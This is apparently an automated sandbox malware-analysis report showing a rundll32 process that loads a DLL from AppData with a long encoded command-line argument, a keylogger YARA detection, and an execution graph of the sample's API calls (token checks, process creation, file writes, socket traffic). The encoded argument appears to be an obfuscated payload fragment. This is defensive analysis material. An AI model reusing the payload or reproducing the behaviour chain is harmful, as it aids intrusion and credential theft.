                                    Start date:13/01/2023
                                    Path:C:\Windows\System32\rundll32.exe
                                    Wow64 process (32bit):false
                                    Commandline: "C:\Users\user\AppData\Roaming\nsis_uns6283e8.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8DWvAEoAUB8AbyMAZv8AcQBtAHUAQc8ATABOJwAtAVlI|4PsKOgEAgAA|0iDxCjDzMzM|0yJRCQYSIlUfyQQSIlMJAhdAf9Ii0QkMEiJBO0kgQE4SG8ACEjHt0QkEC0B6w6BARCvSIPAAY8BEIEBQNtIOZYAcyWfA4sM|yRIA8hIi8FI64tMqwFUewAD0Uj|i8qKCYgI68F+ZgVlSIsEJWDz8P8zyUiLUBhIO||RdDZIg8IgSP+LAkg7wnQqZv+DeEgYdRpMi|9AUGZBgzhrdN0HERFLdQgREHgQ|y50BUiLAOvV10iLSP0AwWoAQFP|VVZXQVRBVUH3VkFXXQFmgTlN|1pNi|hMi|JI34vZD4X88|BMY|9JPEGBPAlQRd8AAA+F6vPwQYv3hAmI8|CFwEiN3zwBD4TWahGDvLsJjC0BD4TH8|BE|4tnIESLXxyL|3ckRItPGEwD|+FMA9lIA|Ezf8lFhckPhKTz8P9Ni8RBixBFM||SSAPTigKEwP90HUHByg0Pvr3A+gABRAPQvxF1|+xBgfqq|A18|3QOg8EBSYPA|wRBO8lzaevG|4vBD7cMTkWL|yyLTAPrdFgzfe2qEHRRQYsUwQD|0zPJigJMi8Jv6w|BycgRA8jlEO8BQYoA1RDtM8A|M|ZBOwy24BCmAP+DxgGD+Ahy7v|rCkiLy0H|1b9JiQT3g8XkEMS|BDtvGHKvZgFB|19BXkFdQVxf915dWzMXSIHsYP0BZACL6ehm|v9||0iFwA+EmHUg60yNrwGLKxDIM||76Jt9II1fBEyN|0VGM9KLy|9U+yRogCBMi+APhPVrdSBFqBAzwIvTvpEgSIl8JCCmIHB+gCBIi|APhEt1IP6mIFBIjVYIRI2|R0BIjYwkhRFI34vY6Hz9fiCNVtVI3iAQ4iHM8|DoZ37vIESLBo1XCEEgeqYgWMohiYQkgIcS7d7z8IsO2iBYiYyxJHERBzCRIOgx7yCL|ZwtMkyLXTpIg|f7bEiKIDBMiWTfJDhMi6QaMkyJ3VyEAYQk3IcRhpJ2jRGNR0swjCTw8|C|SYvU6On8BTCK3Zx4MkiNhHgyQYD|8yGNT2xEMBj+pAKD6QF184G8|ngyIVJleHVNi3eEJPQiMZQk+DUB|8JIO9hyOIP6f2x2M0SNSUD6AE+UQbgAmACmIEDKIs|4dBlEtjDAMUmN91QkbJEgSYPobLvoa4IwSIvOpiB4|0iF|3QSi1VC+UyOMBsxSI1MJEAf|9dIgcR0IWEkLQgALQE=
                                    Imagebase:0x7ff7f70c0000
                                    File size:69632 bytes
                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000003.269724498.0000025AA3818000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high

                                    General

                                    Target ID:13
                                    Start time:05:12:35
                                    Start date:13/01/2023
                                    Path:C:\Windows\System32\WerFault.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 5152 -s 272
                                    Imagebase:0x7ff679980000
                                    File size:494488 bytes
                                    MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:10.9%
                                      Dynamic/Decrypted Code Coverage:74.2%
                                      Signature Coverage:13%
                                      Total number of Nodes:1433
                                      Total number of Limit Nodes:76
                                      execution_graph 13056 401e40 13057 401e56 13056->13057 13058 401f4e 13056->13058 13059 401ee5 13057->13059 13060 401e77 GetProcessHeap HeapAlloc 13057->13060 13059->13058 13062 401f03 GetProcessHeap HeapAlloc 13059->13062 13060->13059 13061 401e9e memcpy 13060->13061 13061->13059 13062->13058 13063 401f2c memcpy 13062->13063 13063->13058 14276 6e3673 14277 6e3682 14276->14277 14278 6e369b 14277->14278 14280 6e81c0 calloc 14277->14280 14281 6e81d3 14280->14281 14283 6e820b 14280->14283 14284 6e86cb GetCurrentProcess 14281->14284 14283->14278 14309 6e8d61 14284->14309 14289 6e86ff GetModuleHandleA 14291 6e871d 14289->14291 14290 6e88f0 14290->14283 14291->14290 14324 6e8ad7 14291->14324 14293 6e8737 14296 6e87a0 14293->14296 14298 6e87a2 memcpy 14293->14298 14300 6e0517 memset 14293->14300 14294 6e88ad 14294->14290 14295 6e88b4 GetPEB 14294->14295 14295->14290 14299 6e88ca 14295->14299 14296->14290 14296->14294 14297 6e87e3 GetCurrentProcess 14296->14297 14297->14294 14305 6e8804 14297->14305 14298->14296 14299->14290 14331 6e8f22 GetModuleHandleW 14299->14331 14300->14293 14302 6e8825 IsBadHugeReadPtr 14303 6e8833 IsBadHugeReadPtr 14302->14303 14302->14305 14304 6e8841 memcmp 14303->14304 14303->14305 14304->14305 14305->14294 14305->14302 14307 6e8876 memcpy 14305->14307 14346 6e0300 LdrInitializeThunk 14305->14346 14347 6e0300 LdrInitializeThunk 14307->14347 14310 6e86e5 14309->14310 14311 6e8d72 GetModuleHandleA GetProcAddress 14309->14311 14312 6e8da7 ExpandEnvironmentStringsW 14310->14312 14311->14310 14313 6e86f1 14312->14313 14314 6e8dd4 CreateFileW 14312->14314 14313->14289 14313->14290 14314->14313 14315 6e8dfb GetFileSize malloc 14314->14315 14316 6e8eae FindCloseChangeNotification 14315->14316 14317 6e8e19 ReadFile 14315->14317 14316->14313 14318 6e8e2d 14317->14318 14319 6e8ea6 ??3@YAXPAX 14317->14319 14318->14319 14320 6e8e41 VirtualAlloc 14318->14320 14319->14316 14320->14319 14321 6e8e64 memcpy 14320->14321 14321->14319 14322 6e8e7a 14321->14322 14323 6e8e80 memcpy 14322->14323 14323->14319 14323->14323 14325 6e8aee 14324->14325 14326 6e8af5 14324->14326 14348 6e8afc 14325->14348 14352 6e8ca5 14326->14352 14332 6e8f42 GetCurrentProcess 14331->14332 14333 6e9090 14331->14333 14334 6e8da7 10 API calls 14332->14334 14333->14299 14335 6e8f53 14334->14335 14335->14333 14336 6e9080 VirtualFree 14335->14336 14337 6e8fd8 IsBadHugeReadPtr 14335->14337 14338 6e907e 14335->14338 14344 6e9047 memcpy 14335->14344 14361 6e868a 14335->14361 14365 6e9094 14335->14365 14369 6e0300 LdrInitializeThunk 14335->14369 14336->14333 14337->14335 14339 6e8fe9 IsBadHugeReadPtr 14337->14339 14338->14336 14339->14335 14370 6e0300 LdrInitializeThunk 14344->14370 14346->14305 14347->14305 14350 6e8b13 14348->14350 14349 6e8af3 14349->14293 14350->14349 14358 6e8c5a 14350->14358 14355 6e8cc2 14352->14355 14353 6e8afa 14353->14293 14354 6e8cec strcmp 14354->14355 14355->14353 14355->14354 14356 6e8d1b 14355->14356 14356->14353 14357 6e8c5a 2 API calls 14356->14357 14357->14353 14359 6e8c8b 14358->14359 14360 6e8c69 strncpy strchr 14358->14360 14359->14349 14360->14359 14364 6e869e 14361->14364 14362 6e86c0 memcmp 14362->14335 14363 6e0517 memset 14363->14364 14364->14362 14364->14363 14366 6e90a1 14365->14366 14368 6e90ce 14365->14368 14367 6e90a9 memcmp 14366->14367 14366->14368 14367->14366 14368->14335 14369->14335 14370->14335 13422 402609 13423 402625 HeapAlloc 13422->13423 13424 40286e 13422->13424 13423->13424 13425 40264d 13423->13425 13436 40240c TlsAlloc TlsSetValue 13425->13436 13428 402683 LoadLibraryW 13429 402854 HeapFree 13428->13429 13432 402721 13428->13432 13429->13424 13430 402845 FreeLibrary 13430->13429 13431 4027c5 strlen 13431->13432 13432->13430 13432->13431 13434 402820 13432->13434 13433 4029f6 13433->13430 13434->13430 13435 408660 free 13434->13435 13435->13433 13437 402430 13436->13437 13437->13428 13437->13429 13080 408624 13081 408628 realloc 13080->13081 13084 6ef808 13085 6ef81b 13084->13085 13086 6ef811 13084->13086 13088 6ef81e CreateEventA InterlockedCompareExchange 13086->13088 13089 6ef84a SetEvent 13088->13089 13090 6ef859 CloseHandle WaitForSingleObject 13088->13090 13091 6ef86b 13089->13091 13090->13091 13091->13085 13083 401ac5 calloc 16022 4012d0 __set_app_type 16025 4011a0 16022->16025 16026 4011c9 SetUnhandledExceptionFilter 16025->16026 16027 4011ad 16025->16027 16028 4011dd 16026->16028 16027->16026 16029 4084b0 _fpreset 16028->16029 16030 4011ea 16029->16030 16031 4076f0 81 API calls 16030->16031 16032 4011ef 16031->16032 16033 401242 _setmode _setmode _setmode 16032->16033 16034 4011f8 __p__fmode 16032->16034 16033->16034 16035 4081a0 9 API calls 16034->16035 16036 40120a 16035->16036 16037 407d00 atexit 16036->16037 16038 401212 __p__environ 16037->16038 16039 402e0b 11 API calls 16038->16039 16040 401233 _cexit ExitProcess 16039->16040 13571 6e2cda VirtualFree 13572 6e2cec memset time srand calloc 13571->13572 13573 6e2dfb ??3@YAXPAX 13572->13573 13574 6e2d41 13572->13574 13578 6e3598 13573->13578 13579 6e2e28 GetCurrentProcess OpenProcessToken 13573->13579 13575 6e2d47 strlen 13574->13575 13722 6e8013 13575->13722 13581 6e2e9d 13579->13581 13582 6e2e42 memset 13579->13582 13689 6e359d 13581->13689 13681 6e415d GetTokenInformation 13582->13681 13583 6e2de3 13589 6e64d1 2 API calls 13583->13589 13588 6e2ea2 13593 6e2eaa 13588->13593 13594 6e2f98 13588->13594 13590 6e2dee ??3@YAXPAX 13589->13590 13590->13573 13591 6e2e77 lstrcmpiW 13592 6e2e94 CloseHandle 13591->13592 13597 6e2e8d 13591->13597 13592->13581 13740 6e35f2 13593->13740 13694 6ec89b GetModuleHandleA 13594->13694 13597->13592 13599 6e2fa0 13699 6e403a 13599->13699 13600 6e358e ??3@YAXPAX 13600->13578 13601 6e2ec2 calloc 13601->13600 13604 6e2edb memcpy memcpy memcpy strlen 13601->13604 13602 6e2d6c 13732 6ef5ba 13602->13732 13605 6e2f6c ??3@YAXPAX 13604->13605 13610 6e358d 13605->13610 13608 6e2fab 13608->13600 13707 6e2975 13608->13707 13610->13600 13612 6e357a 13614 6e64d1 2 API calls 13612->13614 13616 6e3583 ??3@YAXPAX 13614->13616 13616->13610 13617 6e356a GetLastError 13619 6e3570 ??3@YAXPAX 13617->13619 13618 6e3008 13620 6e300f MapViewOfFile 13618->13620 13619->13612 13621 6e3559 GetLastError 13620->13621 13622 6e3029 strlen memcpy memcpy memcpy strcpy 13620->13622 13623 6e355f CloseHandle 13621->13623 13624 6e30a5 UnmapViewOfFile 13622->13624 13625 6e30a1 13622->13625 13623->13619 13626 6e30b6 13624->13626 13625->13624 13627 6e3122 lstrcpyW 13626->13627 13719 6e651b 13627->13719 13630 6e651b 3 API calls 13631 6e3165 13630->13631 13631->13623 13632 6e651b 3 API calls 13631->13632 13633 6e3186 13632->13633 13634 6e2975 4 API calls 13633->13634 13635 6e31b3 13634->13635 13635->13623 13636 6e651b 3 API calls 13635->13636 13637 6e31d0 13636->13637 13638 6e651b 3 API calls 13637->13638 13639 6e31e2 13638->13639 13640 6e3381 GetTickCount _snwprintf ExpandEnvironmentStringsW 13639->13640 13641 6e31f1 GetTickCount _snwprintf ExpandEnvironmentStringsW 13639->13641 13642 6e354d ??3@YAXPAX 13640->13642 13644 6e33b9 CreateFileW 13640->13644 13641->13642 13643 6e3229 CreateFileW 13641->13643 13642->13623 13643->13642 13646 6e3249 WriteFile CloseHandle 13643->13646 13644->13642 13645 6e33d9 WriteFile FindCloseChangeNotification 13644->13645 13645->13642 13647 6e3406 13645->13647 13646->13642 13648 6e3276 13646->13648 13647->13642 13649 6e340f _snwprintf 13647->13649 13648->13642 13650 6e327f _snwprintf 13648->13650 13652 6e343b 13649->13652 13651 6e32ab 13650->13651 13651->13642 13653 6e32b6 GetModuleHandleA 13651->13653 13652->13642 13654 6e3446 GetModuleHandleA 13652->13654 13655 6e32de 13653->13655 13656 6e32d1 GetProcAddress 13653->13656 13657 6e346e 13654->13657 13658 6e3461 GetProcAddress 13654->13658 13659 6e32e6 GetProcAddress 13655->13659 13660 6e32f3 ExpandEnvironmentStringsW 13655->13660 13656->13655 13661 6e3476 GetProcAddress 13657->13661 13662 6e3483 ExpandEnvironmentStringsW 13657->13662 13658->13657 13659->13660 13665 6e336c 13660->13665 13666 6e3319 GetStartupInfoW CreateProcessW 13660->13666 13661->13662 13667 6e34ae 13662->13667 13668 6e353f 13662->13668 13665->13642 13665->13668 13666->13665 13669 6e334e WaitForSingleObject CloseHandle CloseHandle 13666->13669 13670 6e34ee GetStartupInfoW CreateProcessW 13667->13670 13671 6e34b3 CoInitialize 13667->13671 13668->13642 13669->13665 13670->13668 13672 6e3521 WaitForSingleObject CloseHandle CloseHandle 13670->13672 13746 6e3f5f NtQuerySystemInformation malloc 13671->13746 13672->13668 13675 6e34cf 13776 6e6f32 13675->13776 13676 6e34c8 13758 6e6977 13676->13758 13679 6e34cd 13679->13665 13680 6e34db Sleep 13679->13680 13680->13665 13682 6e4187 GetLastError 13681->13682 13683 6e4192 malloc 13681->13683 13682->13683 13684 6e2e70 13682->13684 13683->13684 13685 6e41a3 memset GetTokenInformation 13683->13685 13684->13591 13684->13592 13686 6e4201 ??3@YAXPAX 13685->13686 13687 6e41c3 LookupAccountSidW 13685->13687 13686->13684 13687->13686 13690 6e35ce GetCurrentProcess IsWow64Process 13689->13690 13691 6e35ae GetModuleHandleA GetProcAddress 13689->13691 13692 6e35ed 13690->13692 13693 6e35e3 13690->13693 13691->13690 13691->13692 13692->13588 13693->13588 13693->13692 13695 6ec8b7 13694->13695 13696 6ec8b2 13694->13696 13794 6e93ce 13695->13794 13696->13599 13700 6e404c 13699->13700 13706 6e4082 13699->13706 13701 6e4050 malloc 13700->13701 13700->13706 13702 6e4061 13701->13702 13701->13706 13803 6e4099 memset 13702->13803 13705 6e408b ??3@YAXPAX 13705->13706 13706->13608 13708 6e2992 strlen 13707->13708 13709 6e29cc 13707->13709 13711 6e29ac 13708->13711 13709->13612 13716 6e3f27 13709->13716 13710 6e29f5 malloc 13710->13709 13714 6e2a08 13710->13714 13711->13709 13711->13710 13712 6e2a7f 13712->13709 13713 6e2a86 ??3@YAXPAX 13712->13713 13713->13709 13714->13712 13715 6e2a51 memcpy 13714->13715 13715->13712 13715->13714 13717 6e3f30 rand 13716->13717 13717->13717 13718 6e2fe4 CreateFileMappingW 13717->13718 13718->13617 13718->13618 13815 6e6530 13719->13815 13721 6e3152 13721->13630 13723 6e8029 13722->13723 13724 6e8022 strlen 13722->13724 13820 6e806b 13723->13820 13724->13723 13726 6e2d60 13726->13583 13729 6ef51e 13726->13729 13841 6ef808 13729->13841 13735 6ef5c5 13732->13735 13733 6ef5ca 13733->13583 13735->13733 13739 6ef5fa 13735->13739 13845 6ef6d7 13735->13845 13854 6ef86f GetTickCount 13735->13854 13739->13733 13739->13735 13856 6ef675 13739->13856 13860 6ef7a0 13739->13860 13741 6e2eb5 13740->13741 13742 6e3602 memcpy 13740->13742 13741->13600 13741->13601 13743 6e361b 13742->13743 13743->13741 13744 6e3640 VirtualAlloc 13743->13744 13744->13741 13745 6e3659 memcpy 13744->13745 13745->13741 13747 6e34bf 13746->13747 13748 6e3f93 NtQuerySystemInformation 13746->13748 13747->13675 13747->13676 13749 6e4004 ??3@YAXPAX 13748->13749 13750 6e3fa3 GetCurrentProcess 13748->13750 13749->13747 13959 6e4016 NtQueryInformationProcess 13750->13959 13752 6e3fb7 lstrcmpiW 13753 6e3fc9 OpenProcess 13752->13753 13756 6e3fb1 13752->13756 13754 6e3fde GetCurrentProcess 13753->13754 13753->13756 13960 6e4016 NtQueryInformationProcess 13754->13960 13756->13749 13756->13752 13757 6e3ff3 CloseHandle 13756->13757 13757->13756 13961 6e68d5 memset VerSetConditionMask VerifyVersionInfoW 13758->13961 13761 6e69d1 13964 6e6b56 13761->13964 13763 6e69e5 13764 6e6b3c 13763->13764 13765 6e6a37 SysAllocString SysAllocString SysAllocString SysAllocString 13763->13765 13764->13679 13766 6e6a69 13765->13766 13767 6e6afd 13765->13767 13766->13767 13770 6e6a7a VariantInit VariantInit VariantInit 13766->13770 13768 6e6b0a SysFreeString 13767->13768 13769 6e6b15 13767->13769 13768->13769 13771 6e6b26 13769->13771 13772 6e6b21 SysFreeString 13769->13772 13770->13767 13773 6e6b2c SysFreeString 13771->13773 13774 6e6b31 13771->13774 13772->13771 13773->13774 13774->13764 13775 6e6b37 SysFreeString 13774->13775 13775->13764 13777 6e6f50 13776->13777 13778 6e6f83 SysAllocString 13777->13778 13781 6e7160 13777->13781 13779 6e6fa8 13778->13779 13780 6e6fcf SysAllocString 13779->13780 13779->13781 13780->13781 13782 6e6fe1 13780->13782 13781->13679 13783 6e6ffe SysAllocString 13782->13783 13784 6e7155 SysFreeString 13782->13784 13785 6e714c 13783->13785 13787 6e7013 13783->13787 13784->13781 13785->13784 13786 6e7143 SysFreeString 13786->13785 13787->13786 13788 6e704f lstrlenW lstrlenW calloc 13787->13788 13789 6e7137 13787->13789 13788->13789 13790 6e7084 _snwprintf SysAllocString SysAllocString 13788->13790 13789->13786 13792 6e70ca SysFreeString SysFreeString 13790->13792 13793 6e712b ??3@YAXPAX 13792->13793 13793->13789 13795 6e93ec 13794->13795 13796 6e94b3 13794->13796 13795->13796 13797 6e93f8 lstrlenW NtOpenDirectoryObject 13795->13797 13796->13599 13797->13796 13798 6e9440 calloc calloc 13797->13798 13799 6e9456 NtQueryDirectoryObject 13798->13799 13800 6e94a9 ??3@YAXPAX 13799->13800 13801 6e9471 13799->13801 13800->13796 13801->13799 13801->13800 13802 6e9476 calloc memcpy 13801->13802 13802->13799 13802->13801 13804 6e40c7 13803->13804 13806 6e407b 13804->13806 13807 6e2811 13804->13807 13806->13705 13806->13706 13808 6e2834 13807->13808 13810 6e282f 13807->13810 13808->13810 13811 6e106b 13808->13811 13810->13806 13813 6e1089 13811->13813 13812 6e123e 13812->13810 13813->13812 13814 6e1276 memcpy 13813->13814 13814->13812 13816 6e653d malloc 13815->13816 13817 6e6558 13815->13817 13816->13721 13818 6e658b calloc 13817->13818 13819 6e65a4 memset 13817->13819 13818->13819 13819->13721 13821 6e809f 13820->13821 13822 6e807c memcmp 13820->13822 13823 6e8037 13821->13823 13824 6e80a4 memcmp 13821->13824 13822->13821 13822->13823 13823->13726 13825 6e80cc 13823->13825 13824->13823 13828 6e7f43 13825->13828 13827 6e80ee 13827->13726 13829 6e7f65 13828->13829 13832 6e7ff7 13828->13832 13830 6e7f84 13829->13830 13831 6e7f70 memchr 13829->13831 13830->13832 13833 6e7fd6 memchr 13830->13833 13831->13830 13831->13832 13832->13827 13834 6e7fea 13833->13834 13836 6e667d 13834->13836 13837 6e669f 13836->13837 13838 6e66eb 13837->13838 13839 6e66b0 _allmul 13837->13839 13838->13832 13839->13838 13840 6e66c9 _allmul 13839->13840 13840->13837 13842 6ef52d 13841->13842 13843 6ef811 13841->13843 13842->13602 13844 6ef81e 5 API calls 13843->13844 13844->13842 13846 6ef79c 13845->13846 13849 6ef6e9 13845->13849 13846->13739 13848 6ef776 13848->13849 13893 6f117c 13848->13893 13849->13846 13849->13848 13867 6f0efe 13849->13867 13874 6f1346 13849->13874 13879 6f21aa 13849->13879 13886 6f1257 13849->13886 13855 6ef87e 13854->13855 13855->13735 13859 6ef67a 13856->13859 13857 6ef6d5 13857->13739 13859->13857 13938 6f0236 13859->13938 13861 6ef7af 13860->13861 13862 6ef7b6 GetQueuedCompletionStatus 13860->13862 13955 6eff4d 13861->13955 13864 6ef7e1 GetLastError 13862->13864 13866 6ef7d3 13862->13866 13864->13866 13866->13739 13868 6f0fad 13867->13868 13873 6f0f1e 13867->13873 13869 6f0feb WSARecv 13868->13869 13870 6f1034 13868->13870 13869->13868 13871 6f10b5 WSAGetLastError 13869->13871 13872 6f0927 11 API calls 13870->13872 13870->13873 13871->13870 13872->13873 13873->13849 13875 6f1354 13874->13875 13876 6f1389 setsockopt 13875->13876 13878 6f13a4 13875->13878 13877 6f13c2 WSAGetLastError 13876->13877 13876->13878 13877->13878 13878->13849 13880 6f21c9 13879->13880 13882 6f227f memset WSARecvFrom 13880->13882 13885 6f21e5 13880->13885 13881 6f236e 13881->13849 13884 6f22d5 WSAGetLastError 13882->13884 13882->13885 13884->13885 13885->13881 13899 6f1fa8 memset 13885->13899 13887 6f12bc 13886->13887 13891 6f126a 13886->13891 13888 6f12c6 setsockopt 13887->13888 13889 6f1303 closesocket 13887->13889 13888->13889 13888->13891 13890 6f1316 13889->13890 13889->13891 13913 6f068d socket 13890->13913 13891->13849 13896 6f1192 13893->13896 13894 6f11cb UnregisterWait 13895 6f11d2 13894->13895 13897 6f11d9 CloseHandle 13895->13897 13898 6f11e0 13895->13898 13896->13894 13896->13895 13896->13898 13897->13898 13898->13848 13900 6f1fd9 memset 13899->13900 13901 6f20a5 13899->13901 13904 6f2037 13900->13904 13903 6f20fa GetLastError 13901->13903 13909 6f203b 13901->13909 13905 6f2107 WSAGetLastError 13903->13905 13903->13909 13906 6f206d GetLastError 13904->13906 13904->13909 13907 6f2119 WSAGetLastError 13905->13907 13908 6f2111 WSAGetLastError 13905->13908 13906->13909 13910 6f207e WSAGetLastError 13906->13910 13907->13909 13908->13909 13909->13881 13911 6f208e WSAGetLastError 13910->13911 13912 6f208a WSAGetLastError 13910->13912 13911->13909 13912->13909 13914 6f06ef SetHandleInformation 13913->13914 13915 6f06c7 WSAGetLastError 13913->13915 13918 6f06fe GetLastError 13914->13918 13919 6f073a memset 13914->13919 13916 6f06d7 WSAGetLastError 13915->13916 13917 6f06d3 WSAGetLastError 13915->13917 13937 6f06e3 13916->13937 13917->13937 13921 6f070e GetLastError 13918->13921 13922 6f070a GetLastError 13918->13922 13920 6f0757 13919->13920 13925 6f07a6 GetLastError 13920->13925 13926 6f0787 13920->13926 13923 6f071a 13921->13923 13922->13923 13924 6f0729 closesocket 13923->13924 13924->13937 13925->13926 13927 6f07b3 WSAGetLastError 13925->13927 13931 6f0823 RegisterWaitForSingleObject 13926->13931 13926->13937 13928 6f07bd WSAGetLastError 13927->13928 13929 6f07c5 WSAGetLastError 13927->13929 13930 6f07d5 13928->13930 13929->13930 13933 6f07e1 closesocket 13930->13933 13932 6f083e GetLastError 13931->13932 13931->13937 13934 6f084e GetLastError 13932->13934 13935 6f084a GetLastError 13932->13935 13936 6f07f4 CloseHandle 13933->13936 13933->13937 13934->13937 13935->13937 13936->13937 13937->13891 13939 6f024f 13938->13939 13941 6f031a 13938->13941 13940 6f0263 13939->13940 13939->13941 13942 6f02ad shutdown 13940->13942 13946 6f02a0 13940->13946 13943 6f0336 closesocket 13941->13943 13941->13946 13948 6f0342 13941->13948 13944 6f02c3 WSAGetLastError 13942->13944 13942->13946 13943->13948 13944->13946 13945 6f03c8 13945->13946 13949 6f03de UnregisterWait 13945->13949 13950 6f03e9 13945->13950 13946->13859 13947 6f03bb ??3@YAXPAX 13947->13945 13948->13945 13948->13947 13952 6f037d UnregisterWait 13948->13952 13953 6f0397 CloseHandle 13948->13953 13954 6f03b9 13948->13954 13949->13950 13950->13946 13951 6f03f0 CloseHandle 13950->13951 13951->13946 13952->13948 13953->13948 13954->13947 13956 6eff5e 13955->13956 13957 6ef86f GetTickCount 13956->13957 13958 6ef7b5 13956->13958 13957->13958 13958->13862 13959->13756 13960->13756 13962 6e6954 VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 13961->13962 13963 6e6951 GetCurrentProcess NtQueryInformationProcess 13961->13963 13962->13963 13963->13761 13965 6e6b97 13964->13965 13966 6e6cb2 VariantInit 13965->13966 13967 6e6bc7 13965->13967 13966->13967 13967->13763 16192 409683 16193 40964e 16192->16193 16194 40965d 16193->16194 16196 408d40 malloc 16193->16196 16195 408d90 65 API calls 16194->16195 16197 409672 16195->16197 16196->16194 16198 409679 16197->16198 16199 40969d strlen 16197->16199 16200 4096b9 16199->16200 16201 4096f7 _strdup 16200->16201 16201->16198 16202 409713 16201->16202 16203 408c90 5 API calls 16202->16203 16203->16198 13439 6e36a1 13442 6e36af 13439->13442 13443 6e36be 13442->13443 13448 6e36db 13443->13448 13458 6e3ca3 _alloca_probe memcpy memset getaddrinfo 13443->13458 13445 6e36ac 13447 6e36d2 13449 6e3721 18 API calls 13447->13449 13448->13445 13451 6e46d3 13448->13451 13449->13445 13466 6e481d malloc memset 13451->13466 13453 6e46eb 13467 6e813a malloc 13453->13467 13455 6e470f 13470 6e488a malloc 13455->13470 13459 6e36cc 13458->13459 13460 6e3d10 13458->13460 13459->13447 13459->13448 13461 6e3d3b memcpy 13460->13461 13462 6e3d83 FreeAddrInfoW 13460->13462 13464 6e3d39 13460->13464 13463 6e3d62 htons 13461->13463 13462->13459 13463->13462 13464->13462 13466->13453 13468 6e816c 13467->13468 13469 6e814a memset 13467->13469 13468->13455 13469->13468 13471 6e489a 13470->13471 13474 6e48d1 13471->13474 13479 6e720e 13474->13479 13478 6e4745 13478->13445 13492 6e7198 malloc 13479->13492 13481 6e721f 13482 6e726c memcpy 13481->13482 13483 6e7230 13481->13483 13489 6e48eb 13481->13489 13498 6f1717 13482->13498 13484 6e7239 memcpy 13483->13484 13483->13489 13502 6f1759 13484->13502 13487 6e7267 13488 6e72d2 18 API calls 13487->13488 13487->13489 13488->13489 13489->13478 13490 6e491b ??3@YAXPAX 13489->13490 13491 6e4939 13490->13491 13491->13478 13493 6e71b0 13492->13493 13494 6e71b7 ??3@YAXPAX 13493->13494 13495 6e71c3 13493->13495 13494->13481 13506 6e71d3 malloc memset 13495->13506 13497 6e71cf 13497->13481 13499 6f1744 13498->13499 13500 6f1725 13498->13500 13499->13487 13500->13499 13508 6f0a83 13500->13508 13503 6f1767 13502->13503 13505 6f1787 13502->13505 13503->13505 13544 6f0be6 13503->13544 13505->13487 13507 6e71f5 13506->13507 13507->13497 13509 6f0aa4 13508->13509 13518 6f0a9b 13508->13518 13510 6f0abd 13509->13510 13519 6f16a0 13509->13519 13512 6f0af0 memset 13510->13512 13510->13518 13523 6f17f3 13510->13523 13514 6f0b2f 13512->13514 13516 6f0b81 GetLastError 13514->13516 13514->13518 13517 6f0b8e WSAGetLastError 13516->13517 13516->13518 13517->13518 13518->13499 13520 6f16ac 13519->13520 13522 6f16c7 13519->13522 13520->13522 13526 6f042c 13520->13526 13522->13510 13542 6f17bb WSAIoctl 13523->13542 13529 6f0442 13526->13529 13528 6f043e 13528->13522 13530 6f04b9 bind 13529->13530 13531 6f0450 socket 13529->13531 13532 6f04cd WSAGetLastError 13530->13532 13533 6f046a 13530->13533 13534 6f047a SetHandleInformation 13531->13534 13535 6f0464 WSAGetLastError 13531->13535 13532->13533 13533->13528 13536 6f0489 GetLastError 13534->13536 13537 6f04a3 13534->13537 13535->13533 13539 6f0498 13536->13539 13538 6f04ed 12 API calls 13537->13538 13540 6f04b2 13538->13540 13541 6f049a closesocket 13539->13541 13540->13530 13540->13541 13541->13533 13543 6f0ae0 13542->13543 13543->13512 13543->13518 13545 6f0c07 13544->13545 13554 6f0bfe 13544->13554 13549 6f0c21 13545->13549 13555 6f16db 13545->13555 13546 6f0c54 memset 13551 6f0c93 13546->13551 13548 6f17f3 WSAIoctl 13550 6f0c44 13548->13550 13549->13546 13549->13548 13549->13554 13550->13546 13550->13554 13552 6f0ce5 GetLastError 13551->13552 13551->13554 13553 6f0cf2 WSAGetLastError 13552->13553 13552->13554 13553->13554 13554->13505 13556 6f16e7 13555->13556 13558 6f1703 13555->13558 13556->13558 13559 6f0677 13556->13559 13558->13549 13560 6f0442 19 API calls 13559->13560 13561 6f0689 13560->13561 13561->13558 12733 409ca0 FindNextFileA 12734 409d38 GetLastError 12733->12734 12736 409cc3 12733->12736 12735 409d42 _errno 12734->12735 12734->12736 16308 6e5365 16309 6e52f1 16308->16309 16313 6e5368 16308->16313 16310 6e52fb 16309->16310 16311 6e478a 20 API calls 16309->16311 16312 6e52f9 16311->16312 16314 6e536a 16313->16314 16315 6e53e6 16313->16315 16316 6e5383 16314->16316 16320 6e537e 16314->16320 16321 6e5386 16314->16321 16330 6e642a ??3@YAXPAX 16315->16330 16331 6e6362 5 API calls 16315->16331 16317 6e5446 16318 6e544e 16317->16318 16319 6e5456 16317->16319 16324 6e52e9 20 API calls 16318->16324 16325 6e545a 16319->16325 16326 6e5467 16319->16326 16322 6e478a 20 API calls 16320->16322 16323 6e4a39 12 API calls 16321->16323 16322->16316 16323->16316 16329 6e5454 16324->16329 16328 6e478a 20 API calls 16325->16328 16327 6e4a39 12 API calls 16326->16327 16327->16329 16328->16329 16330->16317 16331->16317 13968 6e497a 13969 6e498a 13968->13969 13970 6e4999 13969->13970 13971 6e49a7 13969->13971 13979 6e4766 13970->13979 13976 6e49b9 13971->13976 13983 6e4d7d 13976->13983 13980 6e477f 13979->13980 13981 6e478a 20 API calls 13980->13981 13982 6e4785 13981->13982 13984 6e4d97 13983->13984 13985 6e4dff 13984->13985 13986 6e4df6 13984->13986 13990 6e4e26 13985->13990 13987 6e478a 20 API calls 13986->13987 13989 6e49b4 13987->13989 14001 6e5602 13990->14001 13992 6e4e52 14013 6e65c6 13992->14013 13996 6e4e9f 14017 6e7344 13996->14017 13998 6e4ed1 13999 6e7434 12 API calls 13998->13999 14000 6e4f04 13999->14000 14000->13989 14002 6e651b 3 API calls 14001->14002 14003 